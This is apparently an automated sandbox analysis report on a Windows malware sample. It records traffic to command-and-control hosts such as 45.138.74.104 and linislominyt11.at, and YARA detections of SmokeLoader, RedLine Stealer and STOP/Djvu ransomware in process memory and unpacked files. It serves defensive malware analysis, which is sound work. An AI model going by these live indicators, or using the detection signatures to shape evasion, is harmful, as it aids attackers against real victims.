Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.74.104
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynbbrbceap.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: linislominyt11.at
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49822 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: 33.exe, 00000028.00000002.487799744.000000000149A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands
barindex
Yara detected Djvu Ransomware
Source: Yara match File source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: A658.exe PID: 5244, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 28.0.A658.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.343161421.00000000040E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.294980929.00000000026E7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000014.00000002.419481551.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001B.00000002.457366920.000000000066D000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.342997867.0000000002546000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.294639140.0000000002680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.418304961.0000000000499000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001C.00000000.445516045.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: A658.exe PID: 5244, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00410450 0_2_00410450
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00413410 0_2_00413410
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_0040FE27 0_2_0040FE27
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_00410EF2 0_2_00410EF2
Source: C:\Users\user\Desktop\5tLwjRFzAW.exe Code function: 0_2_004109A1 0_2_004109A1
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00410450 17_2_00410450
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00413410 17_2_00413410
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_0040FE27 17_2_0040FE27
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_00410EF2 17_2_00410EF2
Source: C:\Users\user\AppData\Roaming\irbiwat Code function: 17_2_004109A1 17_2_004109A1
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0042603E 20_2_0042603E
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0042A130 20_2_0042A130
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_00423F60 20_2_00423F60
Source: C:\Users\user\AppData\Local\Temp\28E9.exe Code function: 20_2_0042AF10 20_2_0042AF10
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_0234CA10 27_2_0234CA10
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_02350B00 27_2_02350B00
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_0234DBE0 27_2_0234DBE0
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_0234B000 27_2_0234B000
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_0234B0B0 27_2_0234B0B0
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_023430EE 27_2_023430EE
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_023500D0 27_2_023500D0
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_023618D0 27_2_023618D0
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_0236F9B0 27_2_0236F9B0
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_0236E9A3 27_2_0236E9A3
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_0234E6E0 27_2_0234E6E0
Source: C:\Users\user\AppData\Local\Temp\A658.exe Code function: 27_2_0234C760 27_2_0234C760
PE file contains strange resources
Source: 5tLwjRFzAW.exe Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: 5tLwjRFzAW.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5tLwjRFzAW.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5tLwjRFzAW.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5tLwjRFzAW.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5tLwjRFzAW.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5tLwjRFzAW.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D0E3.dll.4.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: E69F.exe.4.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: A658.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 28E9.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 28E9.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 28E9.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 28E9.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: irbiwat.4.dr Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: irbiwat.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: irbiwat.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: irbiwat.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: irbiwat.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: irbiwat.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: irbiwat.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.28.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.28.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.28.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.28.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.28.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.28.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.28.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A658.exe.28.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E69F.exe Section loaded: ffrrgwf.dll Jump to behavior
PE file contains more sections than normal
Source: sqlite3.dll.20.dr Static PE information: Number of sections : 18 > 10
Uses 32bit PE files
Source: 5tLwjRFzAW.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 28.0.A658.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
